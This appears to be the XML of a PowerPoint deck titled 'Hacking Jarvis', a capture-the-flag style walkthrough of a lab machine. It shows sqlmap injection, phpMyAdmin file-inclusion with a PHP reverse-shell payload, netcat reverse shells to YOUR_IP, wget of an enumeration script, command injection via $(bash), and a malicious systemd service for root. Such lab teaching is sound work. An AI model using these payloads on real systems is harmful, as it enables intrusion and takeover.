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2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="301" r:id="rId2"/>
    <p:sldId id="317" r:id="rId3"/>
    <p:sldId id="319" r:id="rId4"/>
    <p:sldId id="323" r:id="rId5"/>
    <p:sldId id="327" r:id="rId6"/>
    <p:sldId id="329" r:id="rId7"/>
    <p:sldId id="333" r:id="rId8"/>
    <p:sldId id="336" r:id="rId9"/>
    <p:sldId id="341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367B9-3F20-6747-B5A2-A850FD5819AB}" v="1" dt="2020-01-21T16:46:42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4"/>
    <p:restoredTop sz="85359"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="126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Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}"/>
    <pc:docChg chg="delSld modSld sldOrd">
      <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:54.870" v="17" actId="2696"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:01.978" v="2" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="15215161" sldId="315"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:45:55.992" v="1" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3327479853" sldId="316"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:02.011" v="3" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3444163047" sldId="318"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:07.870" v="4" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="600782577" sldId="320"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:07.903" v="5" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4079346635" sldId="321"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:15.953" v="6" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2155149743" sldId="325"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:15.998" v="7" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2091226787" sldId="326"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:28.959" v="8" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="637941441" sldId="328"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:28.984" v="9" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1897689167" sldId="330"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:32.774" v="10" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="347174277" sldId="331"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:32.798" v="11" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3486430095" sldId="332"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del ord">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:45.481" v="14" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3145972916" sldId="334"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:45.458" v="13" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="424312836" sldId="335"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:42.809" v="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2753779009" sldId="336"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:54.789" v="15" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2571334820" sldId="337"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:54.829" v="16" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2569623389" sldId="338"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:46:54.870" v="17" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="73416583" sldId="339"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:45:55.967" v="0" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="320019397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8A2CF-1390-A04A-A676-C803B10A3FDD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3268F-D626-3B44-A83B-93E6C2900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0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3268F-D626-3B44-A83B-93E6C2900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1/21/20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1/21/20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1/21/20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9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73" r:id="rId7"/>
    <p:sldLayoutId id="2147483674" r:id="rId8"/>
    <p:sldLayoutId id="2147483675" r:id="rId9"/>
    <p:sldLayoutId id="2147483677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happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8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ebootuser/LinEnum/master/LinEnum.s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your_ip/LinEnum.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tfobins.github.io/gtfobins/systemctl/#sui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ellhacks.com/systemd-service-file-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Hacking Jarvis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95A81-070D-9748-965E-9D922B9DA2F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207658" y="5038282"/>
            <a:ext cx="507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10.10.10.143</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71302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2288931" cy="5646208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Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc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0" y="0"/>
            <a:ext cx="9055099" cy="68580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92608" lvl="1" indent="0" algn="ctr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Hacked!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0" algn="ctr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You’re now root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0" algn="ctr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 algn="ctr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 algn="ctr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6C6C6-9C89-1943-AF65-1BB2B93B6CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6413679" y="3567448"/>
            <a:ext cx="2826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3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whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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718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Scanning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6353704"/>
          </a:xfrm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200" dirty="0"/>
              <a:t>Scanning</a:t>
            </a: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jarvis.nmap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10.10.10.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1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Dirbuster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Discovered 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phpmyadmin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FDD8D0-DA89-8744-8211-1AA9DBE0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62" y="1782537"/>
            <a:ext cx="7022308" cy="446956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04C423C-91B8-7946-B03C-9F80DD50A17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7073900" y="4762500"/>
            <a:ext cx="1231900" cy="330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42F640-1B0A-8C4E-95E1-E884D197C364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039362" y="2209800"/>
            <a:ext cx="1399538" cy="4113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Exploiting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858442" cy="6252104"/>
          </a:xfrm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200" dirty="0"/>
              <a:t>Site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looking around we notice</a:t>
            </a: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Let’s try SQL Injection</a:t>
            </a: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sqlmap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–password –-delay 2 –random-agent –u http://10.10.10.143/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room.php?cod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</a:t>
            </a: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–password because we want to access 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phpmyadmin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Discovered Username and PW for database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1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Dbadmin:imissyou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D9B37-5B30-7442-8A95-923A3C13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58" y="1502222"/>
            <a:ext cx="5084231" cy="8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Exploiting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858442" cy="6252104"/>
          </a:xfrm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200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>phpmyadmin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notice the version and look it up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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Summary:</a:t>
            </a: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PHP code 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index.php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will include any file passed in as a “target” variable. It validates it by checking against a whitelist but can be bypassed by adding something from the whitelist. This makes our payload:</a:t>
            </a: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index.php?target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sql.php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?/path/to/file/to/include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File do we want to include?</a:t>
            </a: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site goes on to mention that if you make a query on the database, it’s stored in your session. Session information is stored in /var/lib/php/sessions/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sess_SESSIONID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4EBE0-7C57-6B40-9898-DFBD095A2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081" y="412750"/>
            <a:ext cx="3302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Exploiting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858442" cy="6671204"/>
          </a:xfrm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200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>phpmyadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Plan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a query on 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server_sql.php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'&lt;?php $sock=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fsockopen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(”YOUR_IP",4444); $proc=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proc_open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("/bin/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array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock), $pipes);?&gt;’ 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Session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RightClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect Element &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Tab &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select an item &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies &gt;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 listener and visit site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nlvp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4444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Visit http://10.10.10.143/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phpmyadmin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index.php?target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sql.php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?../../../../../var/lib/php/sessions/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sess_ID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-YOU-COPIED</a:t>
            </a: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3E50-01D2-3348-B7B4-EBFC882B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24" y="3429000"/>
            <a:ext cx="4343807" cy="16088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C4A5172-FF4F-344F-882D-4AB7AB8601DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9598662" y="4051300"/>
            <a:ext cx="828038" cy="3115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55C8CF-E22A-084A-AECE-21C2F00A850B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7355824" y="3576159"/>
            <a:ext cx="828038" cy="3115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723B57-8E63-C24C-9B98-1D85ED874AFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9598662" y="4560962"/>
            <a:ext cx="2100969" cy="4242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Priv Esc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0" y="0"/>
            <a:ext cx="9055099" cy="68580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201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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www-data -&gt; Pepper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 with Linux Enumeration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LinEnum.sh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the target machine and run it.</a:t>
            </a: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[Locally]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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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python –m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SimpleHTTPServer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80</a:t>
            </a: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[On Target Machine]</a:t>
            </a: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cd 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http://YOUR_IP/LinEnum.sh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chmod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+x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LinEnum.sh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./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LinEnum.sh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tee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enum.txt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Notice 2 interesting things:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="29260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4E439-2D61-7040-9D4A-5E19B747A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962" y="6016443"/>
            <a:ext cx="5778500" cy="733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6A879C-4C38-3945-96E4-1164CC0C9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357" y="4713981"/>
            <a:ext cx="5654343" cy="12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2288931" cy="5646208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Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc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0" y="0"/>
            <a:ext cx="9055099" cy="68580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201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3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can run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simpler.py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Pepper. Let’s read through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simpler.py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see if we can take advantage of this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3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65760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3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32086-4308-1947-9151-8B423EBD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1746250"/>
            <a:ext cx="50927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EDBB8-1E4D-FA4C-8239-A4FE843CD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134" y="1746250"/>
            <a:ext cx="2654300" cy="67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87250-483A-334E-801F-C7C4D3C055AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3263900" y="2641600"/>
            <a:ext cx="3250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Calling this script with –p will call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exec_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function.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12071-BC93-8949-AAA2-85B0F34960AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286353" y="3703935"/>
            <a:ext cx="8413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attempt to filter that input, then run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>system command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (read: bash) with our user-supplied input placed directly in it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategy: Let’s get a malicious command in there, we just need to bypass the filter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input: $(bash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will launch a shell as pepper and it doesn’t contain any forbidden characters. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386856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2288931" cy="5646208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Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc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0" y="0"/>
            <a:ext cx="9055099" cy="68580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201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4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we have a blind shell. (Can’t see any results!)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 can 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tcpdump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ping to test that we do have command injection.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Let’s establish a better shell:</a:t>
            </a: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 a new listener at a different port on your machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="20116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Target machine run:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1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YOUR_IP PORT –e /bin/bash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whoami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see that you are now Pepper.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4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7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CCB0-0F31-8347-A5B7-5DC8973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2288931" cy="5646208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Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc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DEEE0D-0C43-6745-85E5-F6BE715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0" y="0"/>
            <a:ext cx="9055099" cy="68580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201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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r>
              <a:rPr lang="en-US" sz="2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Pepper -&gt; root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Looking at the SUID binary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GTFO bins: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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/systemctl/#suid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="635508" lvl="1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Summary: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need to create a service as Pepper that is malicious (reverse shell). Link it, and then enable it. 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Google “How to make a service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linux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[Unit]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Ownage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[Service]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ExecStart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=/bin/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–c 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YOUR_IPD PORT -e /bin/bash”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[Install]</a:t>
            </a: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WantedBy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=multi-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user.target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Either write the file and send it using webserver +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use Echo commands to build the file line-by-line in a reverse shell.</a:t>
            </a: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link /home/pepper/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own.service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[Start your listener]</a:t>
            </a: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enable –-now /home/pepper/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own.service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[If you have trouble and need to try again]</a:t>
            </a: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systemctl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restart /home/pepper/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own.service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Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.shellhacks.com/systemd-service-file-example/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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more info.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92608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75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820</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen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Menlo</vt:lpstr>
      <vt:lpstr>News Gothic MT</vt:lpstr>
      <vt:lpstr>RetrospectVTI</vt:lpstr>
      <vt:lpstr>Hacking Jarvis</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv 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Jarvis</dc:title>
  <dc:creator>Anthony Pipia</dc:creator>
  <cp:lastModifiedBy>Anthony Pipia</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-21T16:44:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-21T16:46:58Z</dcterms:modified>
</cp:coreProperties>
</file>